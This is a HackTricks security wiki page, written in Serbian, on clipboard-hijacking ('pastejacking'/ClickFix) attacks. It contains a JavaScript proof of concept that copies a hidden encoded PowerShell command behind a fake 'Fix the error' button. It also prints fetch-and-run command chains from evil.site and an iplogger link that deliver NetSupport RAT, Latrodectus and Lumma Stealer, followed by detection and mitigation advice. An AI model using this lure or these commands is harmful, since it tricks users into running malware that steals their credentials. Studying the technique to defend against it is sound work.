Napadi na Preuzimanje Klipborda (Pastejacking)

Reading time: 5 minutes

tip

Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Učite i vežbajte Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Podržite HackTricks

"Nikada ne lepite ništa što niste sami kopirali." – stara, ali još uvek važeća preporuka

Pregled

Preuzimanje klipborda – takođe poznato kao pastejacking – koristi činjenicu da korisnici rutinski kopiraju i lepe komande bez da ih pregledaju. Zlonamerna veb stranica (ili bilo koji kontekst sposoban za JavaScript, kao što su Electron ili Desktop aplikacije) programatski postavlja tekst pod kontrolom napadača u sistemski klipbord. Žrtve su podstaknute, obično pažljivo osmišljenim uputstvima socijalnog inženjeringa, da pritisnu Win + R (Run dijalog), Win + X (Brzi pristup / PowerShell), ili da otvore terminal i lepe sadržaj klipborda, odmah izvršavajući proizvoljne komande.

Pošto nema preuzetih fajlova i nijedna priloga nije otvorena, tehnika zaobilazi većinu bezbednosnih kontrola e-pošte i veb sadržaja koje prate priloge, makroe ili direktno izvršavanje komandi. Napad je stoga popularan u phishing kampanjama koje isporučuju komercijalne porodice malvera kao što su NetSupport RAT, Latrodectus loader ili Lumma Stealer.

JavaScript Dokaz Koncepta

html
<!-- Any user interaction (click) is enough to grant clipboard write permission in modern browsers -->
<button id="fix" onclick="copyPayload()">Fix the error</button>
<script>
function copyPayload() {
const payload = `powershell -nop -w hidden -enc <BASE64-PS1>`; // hidden PowerShell one-liner
navigator.clipboard.writeText(payload)
.then(() => alert('Now press  Win+R , paste and hit Enter to fix the problem.'));
}
</script>

Starije kampanje su koristile document.execCommand('copy'), dok se novije oslanjaju na asinhroni Clipboard API (navigator.clipboard.writeText).

Tok ClickFix / ClearFake

  1. Korisnik posećuje sajt sa tipografskom greškom ili kompromitovan sajt (npr. docusign.sa[.]com)
  2. Umetnuti ClearFake JavaScript poziva unsecuredCopyToClipboard() pomoćnu funkciju koja tiho čuva Base64-enkodiranu PowerShell jedinstvenu komandu u clipboard-u.
  3. HTML uputstva govore žrtvi: “Pritisnite Win + R, nalepite komandu i pritisnite Enter da biste rešili problem.”
  4. powershell.exe se izvršava, preuzimajući arhivu koja sadrži legitimni izvršni fajl plus zlonamerni DLL (klasično DLL sideloading).
  5. Loader dekriptuje dodatne faze, umetne shellcode i instalira postojanost (npr. zakazani zadatak) – na kraju pokreće NetSupport RAT / Latrodectus / Lumma Stealer.

Primer NetSupport RAT lanca

powershell
powershell -nop -w hidden -enc <Base64>
# ↓ Decodes to:
Invoke-WebRequest -Uri https://evil.site/f.zip -OutFile %TEMP%\f.zip ;
Expand-Archive %TEMP%\f.zip -DestinationPath %TEMP%\f ;
%TEMP%\f\jp2launcher.exe             # Sideloads msvcp140.dll
  • jp2launcher.exe (legitimni Java WebStart) pretražuje svoj direktorijum za msvcp140.dll.
  • Maliciozni DLL dinamički rešava API-je sa GetProcAddress, preuzima dva binarna fajla (data_3.bin, data_4.bin) putem curl.exe, dekriptuje ih koristeći rolling XOR ključ "https://google.com/", injektuje konačni shellcode i raspakuje client32.exe (NetSupport RAT) u C:\ProgramData\SecurityCheck_v1\.

Latrodectus Loader

powershell -nop -enc <Base64>  # Cloud Identificator: 2031
  1. Preuzima la.txt sa curl.exe
  2. Izvršava JScript downloader unutar cscript.exe
  3. Preuzima MSI payload → postavlja libcef.dll pored potpisane aplikacije → DLL sideloading → shellcode → Latrodectus.

Lumma Stealer putem MSHTA

mshta https://iplogger.co/xxxx =+\\xxx

mshta poziv pokreće skriveni PowerShell skript koji preuzima PartyContinued.exe, ekstrahuje Boat.pst (CAB), rekonstruiše AutoIt3.exe putem extrac32 i spajanja fajlova, i na kraju pokreće .a3x skript koji exfiltrira kredencijale pretraživača na sumeriavgv.digital.

Detekcija i Lov

Plave ekipe mogu kombinovati telemetriju clipboard-a, kreiranja procesa i registra kako bi precizno odredile zloupotrebu pastejacking-a:

  • Windows Registry: HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU čuva istoriju Win + R komandi – tražite neobične Base64 / obfuskovane unose.
  • ID sigurnosnog događaja 4688 (Kreiranje procesa) gde je ParentImage == explorer.exe i NewProcessName u { powershell.exe, wscript.exe, mshta.exe, curl.exe, cmd.exe }.
  • Događaj ID 4663 za kreiranje fajlova pod %LocalAppData%\Microsoft\Windows\WinX\ ili privremenim folderima neposredno pre sumnjivog događaja 4688.
  • EDR senzori clipboard-a (ako su prisutni) – korelacija Clipboard Write odmah nakon novog PowerShell procesa.

Mogućnosti ublažavanja

  1. Ojačavanje pretraživača – onemogućiti pristup pisanju u clipboard (dom.events.asyncClipboard.clipboardItem itd.) ili zahtevati korisnički gest.
  2. Bezbednosna svest – podučiti korisnike da kucaju osetljive komande ili ih prvo nalepite u tekstualni editor.
  3. PowerShell Constrained Language Mode / Politika izvršenja + Kontrola aplikacija za blokiranje proizvoljnih jedne-linijskih komandi.
  4. Mrežne kontrole – blokirati odlazne zahteve ka poznatim pastejacking i malware C2 domenima.

Povezani trikovi

  • Discord Invite Hijacking često zloupotrebljava isti ClickFix pristup nakon što namami korisnike u zloćudni server:

Discord Invite Hijacking

Reference

tip

Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Učite i vežbajte Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Podržite HackTricks